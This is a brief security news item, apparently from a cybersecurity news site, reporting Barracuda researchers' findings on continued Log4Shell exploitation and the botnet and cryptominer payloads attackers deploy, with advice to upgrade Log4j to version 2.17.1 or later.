The critical vulnerability Log4Shell (CVE-2021-44228) in the Apache Log4j Java-based logging platform is used by attackers to deploy various malware payloads, including turning devices into DDoS bots and installing cryptominers.
According to experts from Barracuda, the last couple of months have been characterized by spikes and spikes in attacks using Log4Shell, but the number of exploitation attempts has remained relatively constant. Most of the exploitation attempts were made from IP addresses in the USA, followed by Japan, Central Europe and Russia. As experts noted, many computer systems continue to work with old versions of the popular logging environment, being at risk of cyberattacks.
Among the payloads used by criminals in these attacks, the lion’s share is occupied by derivatives of the Mirai botnet. The Mirai malware targets public network cameras, routers, and other devices and connects them to a botnet. An attacker can then control a botnet to perform DDoS attacks on a specific target, draining their resources and disrupting online services.
The attackers behind these operations either lease the botnet’s power to others, or launch DDoS attacks themselves to extort money from companies.
Other payloads that have been involved in the recent operation of Log4j include: BillGates (DDoS), Kinsing (cryptominer), XMRig (cryptominer) and Muhstik (DDoS).
The easiest way to protect yourself from such attacks is to upgrade Log4j to version 2.17.1 or higher.